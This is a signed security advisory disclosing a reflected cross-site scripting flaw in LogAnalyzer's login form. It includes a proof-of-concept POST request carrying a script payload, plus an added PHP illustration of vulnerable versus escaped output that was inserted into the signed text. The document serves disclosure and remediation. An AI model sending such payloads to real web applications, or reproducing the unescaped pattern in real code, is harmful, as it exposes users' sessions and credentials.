-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2021-024
Product: LogAnalyzer
Manufacturer: Adiscon
Affected Version(s): 4.1.10, 4.1.11
Tested Version(s): 4.1.10, 4.1.11
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
CVSS Score: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
Solution Status: Fixed
Manufacturer Notification: 2021-04-21
Solution Date: 2021-04-29
Public Disclosure: 2021-05-07
CVE Reference: CVE-2021-31738
Author of Advisory: Michael Strametz, SySS Cyber Security GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Adiscon LogAnalyzer is a web interface to syslog and other network event
data. It provides easy browsing, analysis of realtime network events and
reporting services.[1]

Due to insufficient user input validation and escaping, LogAnalyzer is
vulnerable to reflected cross-site scripting (XSS).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to place JavaScript code within the fields username
("uname") and password ("pass") of the login form. The JavaScript code
is reflected by the server and executed in the victim's browser.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Place JavaScript code within the field "uname" and send it as an HTTP
POST request:

POST /login.php HTTP/1.1
Host: loganalyzer-demo.adiscon.com
[...]
Content-Length: 144
Cookie: PHPSESSID=7l8nvd0341l7gkav73j45pohhs

uname=syss%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29
%3C%2Fscript%3E%3C%5C%21--&pass=topsecret&op=login&referer=index.php

If the JavaScript code is executed, an alert box will be opened showing
the message "XSS".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The reported security issues have been fixed in newer LogAnalyzer
software versions. Update LogAnalyzer to the latest version [2].
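The following PHP snippet is an added illustration of the defect class the advisory describes; it is not code from the advisory or from the LogAnalyzer project, and the two render functions and the form fragment are hypothetical. It places the decoded form of the advisory's "uname" PoC value into a login form first without escaping (the reflected-XSS pattern) and then with context-appropriate HTML attribute escaping via htmlspecialchars(), which is the standard PHP remedy for CWE-79 in this output context.

```php
<?php
// Added example, not LogAnalyzer's own code: a minimal login form that
// re-displays the submitted username, first unescaped, then escaped.

// Vulnerable pattern: the raw request value is concatenated straight into
// an HTML attribute. A value containing  ">  closes the attribute and the
// <input> tag, so any markup that follows is parsed as part of the page
// (reflected cross-site scripting, CWE-79).
function render_login_vulnerable(string $uname): string
{
    return '<input type="text" name="uname" value="' . $uname . '">';
}

// Hardened pattern: escape for the HTML attribute context before output.
// ENT_QUOTES encodes both " and ' so the value cannot terminate the
// attribute; ENT_SUBSTITUTE replaces invalid UTF-8 sequences instead of
// returning an empty string (which would silently drop the value).
function render_login_safe(string $uname): string
{
    $safe = htmlspecialchars($uname, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="uname" value="' . $safe . '">';
}

// Constructed sample input: the URL-decoded "uname" value from the PoC above.
// (Single quotes keep the backslash literal in PHP.)
$poc = 'syss"><script>alert(String.fromCharCode(88,83,83))</script><\!--';

echo "Vulnerable output (tag is broken open, script is injected):\n";
echo render_login_vulnerable($poc), "\n\n";

echo "Hardened output (value stays inside the attribute as inert text):\n";
echo render_login_safe($poc), "\n";
```

Run with `php example.php`; in the hardened output the quote and angle brackets appear as `&quot;`, `&lt;` and `&gt;`, so the browser renders the payload as the literal username text rather than as markup. Escaping must match the output context: htmlspecialchars() is correct for HTML element content and quoted attributes, but a value written into a JavaScript block or a URL needs the encoder for that context instead.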
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-03-24: Vulnerability discovered
2021-04-21: Vulnerability reported to manufacturer
2021-04-21: Manufacturer acknowledged receipt of security advisory
2021-04-21: Manufacturer asks for more information
2021-04-22: SySS answers open questions
2021-04-23: Manufacturer responds and will look into the reported
            security issue
2021-04-29: Release of new software version (4.1.12) fixing the
            reported security issue
2021-05-07: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Adiscon LogAnalyzer
    https://loganalyzer.adiscon.com/
[2] Download page for LogAnalyzer
    https://loganalyzer.adiscon.com/downloads/
[3] Download page for LogAnalyzer 4.1.11
    https://loganalyzer.adiscon.com/downloads/loganalyzer-v4-1-11-v4-stable/
[4] SySS security advisory SYSS-2021-024
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-024.txt
[5] SySS responsible disclosure policy
    https://www.syss.de/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Michael Strametz of SySS Cyber
Security GmbH (Austria).

E-Mail: michael.strametz@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Michael_Strametz.asc
Key Fingerprint: AD50 E8B8 4E6E 5E00 F45F CE35 744F A11A 2EAC 214D

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEErVDouE5uXgD0X841dE+hGi6sIU0FAmCT+EgACgkQdE+hGi6s
IU2njg//TFOVswoxm1CX30AcBSuMcBi5jSnpm45pajTvdQQ66ULk/+NjsGN2eYJu
EHo+MehMc6L0i8+VkLIRaVCsH8of/e5Rnt1elYgEDk842nnd4r2cd1D7hXT7+aeL
ZYjCD4OTO0Xbgp0GUGEVbxpq8r3C6BCSv1jEjBNl9oDduX3Ro7hNcJozcrWjlQ4C
tHmud6Yv5xm2pi8kMY9ZPcGIMGYiXqcU+Mmfb5/CrqMSTrbMQ/CcNKcBMCj4BCJb
hGufSOQAxfjt1SQyPFkBbRYi0q4i7DNDzQrzjwpHK46oewkmpv5CjTD8e3X/Lc/T
5ysdaAUhsawSbf+Nur0kU8Ln02uiGFrFFdwr48aQri31JkjaRRpe957sQVCNRsbX
RiDyjSDKE0V2DUXyIOq5XCt9+ktPKvQtI2td+tIfHkZKYhvO1FbMXap+PJMLeoau
fdhUqOyHygbGq4VJAgZc5C9NSapPgK4B69sEKfOIRZQ7WiIGEW/upVEhLjy8dGId
i2t2F3Yj/ECZeS8fDfTtWN3c9YDs+u3gW4sMx1nr8itJ5DSPdC0+sfxb6grXoZuj
KLMGOP0LMB386iGKgEQ7aAbAG3uDUdOKpWmOPpOo76bvVnxrWdTp42tEMsiUmwAK
uSIm5lajCzhxFWbiewllxnmAG4wsh2sC7IaRANkmKocBOMHnImo=
=q3sH
-----END PGP SIGNATURE-----